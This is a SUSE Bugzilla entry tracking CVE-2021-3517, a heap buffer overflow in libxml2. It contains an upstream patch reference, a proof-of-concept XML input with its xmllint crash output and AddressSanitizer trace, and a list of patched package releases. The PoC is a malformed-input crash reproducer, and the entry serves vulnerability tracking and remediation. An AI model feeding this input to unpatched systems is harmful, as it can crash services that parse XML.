Bug 1185410 (CVE-2021-3517)

Summary: VUL-0: CVE-2021-3517: libxml2: heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c
Product: [Novell Products] SUSE Security Incidents Reporter: Robert Frohl <rfrohl>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: pmonrealgonzalez, smash_bz, stoyan.manolov
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/282977/
Whiteboard: CVSSv3.1:SUSE:CVE-2021-3517:5.9:(AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: PoC from https://gitlab.gnome.org/GNOME/libxml2/-/issues/235
PoC from https://gitlab.gnome.org/GNOME/libxml2/-/issues/235

Description Robert Frohl 2021-04-28 12:56:20 UTC 
rh#1954232

A heap-based buffer overflow was found in libxml2 when processing truncated UTF-8 input.

Reference:
https://gitlab.gnome.org/GNOME/libxml2/-/issues/235

Upstream patch:
https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1954232
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3517
Comment 2 Pedro Monreal Gonzalez 2021-04-28 18:05:23 UTC 
Factory submission:
   https://build.opensuse.org/request/show/889099
Comment 3 Pedro Monreal Gonzalez 2021-04-28 18:24:17 UTC 
Created attachment 848854 [details]
PoC from https://gitlab.gnome.org/GNOME/libxml2/-/issues/235

All codestreams affected:

germ204:/usr/src/packages # ./BUILD/libxml2-2.9.7/xmllint --recover --postvalid poc2
poc2:3: parser error : Input is not proper UTF-8, indicate encoding !
Bytes: 0xEC 0x22 0x20 0x69
<xsl:output method="htm�" indent="yes" encoding="utf-8" doctype-public="-//W3C//
                       ^
<?xml version="1.0"?>
<!DOCTYPE stylesheet [
<!ENTITY nbsp "<xsl:text disable-output-escaping='yes'>&amp;nbsp;</xsl:text>">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="2.0">
<xsl:output method="htm�" indent="yes" encoding="utf-8" doctype-public="-//W3C//DTD HTML 4.01 Transitional//EN"/>
</xsl:stylesheet>
poc2:2: element stylesheet: validity error : No declaration for element stylesheet
poc2:2: element stylesheet: validity error : No declaration for attribute version of element stylesheet
poc2:2: element stylesheet: validity error : No declaration for attribute xmlns:xsl of element stylesheet
poc2:3: element output: validity error : No declaration for element output
=================================================================
==16692==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000336 at pc 0x7f570a0b640e bp 0x7ffe91879d70 sp 0x7ffe91879d68
READ of size 1 at 0x602000000336 thread T0
    #0 0x7f570a0b640d in xmlEncodeEntitiesInternal /usr/src/packages/BUILD/libxml2-2.9.7/entities.c:583
    #1 0x7f570a11989c in xmlNodeListGetString__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/tree.c:1699
    #2 0x7f570a15e655 in xmlValidateElement__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/valid.c:6415
    #3 0x7f570a15e588 in xmlValidateElement__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/valid.c:6434
    #4 0x7f570a15eeed in xmlValidateDocument__internal_alias /usr/src/packages/BUILD/libxml2-2.9.7/valid.c:6871
    #5 0x40c468 in parseAndPrintFile /usr/src/packages/BUILD/libxml2-2.9.7/xmllint.c:2809
    #6 0x406afd in main /usr/src/packages/BUILD/libxml2-2.9.7/xmllint.c:3757
    #7 0x7f5709503349 in __libc_start_main (/lib64/libc.so.6+0x24349)
    #8 0x408789 in _start (/usr/src/packages/BUILD/libxml2-2.9.7/.libs/xmllint+0x408789)

0x602000000336 is located 0 bytes to the right of 6-byte region [0x602000000330,0x602000000336)
allocated by thread T0 here:
    #0 0x7f570ad41500 in malloc (/usr/lib64/libasan.so.4+0xdc500)
    #1 0x7f570a1f3d2a in xmlBufResize /usr/src/packages/BUILD/libxml2-2.9.7/buf.c:827

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/packages/BUILD/libxml2-2.9.7/entities.c:583 in xmlEncodeEntitiesInternal
Shadow bytes around the buggy address:
  0x0c047fff8010: fa fa 00 03 fa fa 06 fa fa fa 00 01 fa fa 05 fa
  0x0c047fff8020: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8030: fa fa fd fa fa fa fd fa fa fa 04 fa fa fa fd fa
  0x0c047fff8040: fa fa fd fa fa fa 05 fa fa fa 00 03 fa fa fd fa
  0x0c047fff8050: fa fa fd fa fa fa fd fd fa fa 04 fa fa fa fd fa
=>0x0c047fff8060: fa fa fd fa fa fa[06]fa fa fa fd fa fa fa fd fd
  0x0c047fff8070: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
  0x0c047fff8080: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 05 fa
  0x0c047fff8090: fa fa 07 fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16692==ABORTING
Comment 6 Swamp Workflow Management 2021-05-05 19:25:34 UTC 
SUSE-SU-2021:1523-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 1185408,1185409,1185410
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518
JIRA References: 
Sources used:
SUSE MicroOS 5.0 (src):    libxml2-2.9.7-3.31.1
SUSE Linux Enterprise Module for Python2 15-SP3 (src):    python-libxml2-python-2.9.7-3.31.1
SUSE Linux Enterprise Module for Python2 15-SP2 (src):    python-libxml2-python-2.9.7-3.31.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    libxml2-2.9.7-3.31.1, python-libxml2-python-2.9.7-3.31.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    libxml2-2.9.7-3.31.1, python-libxml2-python-2.9.7-3.31.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 7 Swamp Workflow Management 2021-05-05 19:26:49 UTC 
SUSE-SU-2021:1524-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 1185408,1185409,1185410
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518
JIRA References: 
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    libxml2-2.9.4-46.40.1
SUSE Linux Enterprise Server 12-SP5 (src):    libxml2-2.9.4-46.40.1, python-libxml2-2.9.4-46.40.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 8 Swamp Workflow Management 2021-05-09 07:15:07 UTC 
openSUSE-SU-2021:0692-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 1185408,1185409,1185410
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    libxml2-2.9.7-lp152.10.9.1, python-libxml2-python-2.9.7-lp152.10.9.1
Comment 10 Swamp Workflow Management 2021-05-19 19:17:41 UTC 
SUSE-SU-2021:1654-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1185408,1185409,1185410,1185698
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
SUSE MicroOS 5.0 (src):    libxml2-2.9.7-3.34.1
SUSE Linux Enterprise Module for Python2 15-SP3 (src):    python-libxml2-python-2.9.7-3.34.1
SUSE Linux Enterprise Module for Python2 15-SP2 (src):    python-libxml2-python-2.9.7-3.34.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    libxml2-2.9.7-3.34.1, python-libxml2-python-2.9.7-3.34.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    libxml2-2.9.7-3.34.1, python-libxml2-python-2.9.7-3.34.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 11 Swamp Workflow Management 2021-05-19 19:20:32 UTC 
SUSE-SU-2021:14729-1: An update that fixes 9 vulnerabilities is now available.

Category: security (important)
Bug References: 1159928,1161517,1161521,1176179,1185408,1185409,1185410,1185698
CVE References: CVE-2014-0191,CVE-2019-19956,CVE-2019-20388,CVE-2020-24977,CVE-2020-7595,CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    libxml2-2.7.6-0.77.36.1, libxml2-python-2.7.6-0.77.36.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 12 Swamp Workflow Management 2021-05-19 19:22:34 UTC 
SUSE-SU-2021:1658-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1185408,1185409,1185410,1185698
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE OpenStack Cloud Crowbar 8 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE OpenStack Cloud 9 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE OpenStack Cloud 8 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP5 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1
HPE Helion Openstack 8 (src):    libxml2-2.9.4-46.43.1, python-libxml2-2.9.4-46.43.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 13 Swamp Workflow Management 2021-05-22 10:19:42 UTC 
openSUSE-SU-2021:0764-1: An update that fixes four vulnerabilities is now available.

Category: security (important)
Bug References: 1185408,1185409,1185410,1185698
CVE References: CVE-2021-3516,CVE-2021-3517,CVE-2021-3518,CVE-2021-3537
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    libxml2-2.9.7-lp152.10.12.1, python-libxml2-python-2.9.7-lp152.10.12.1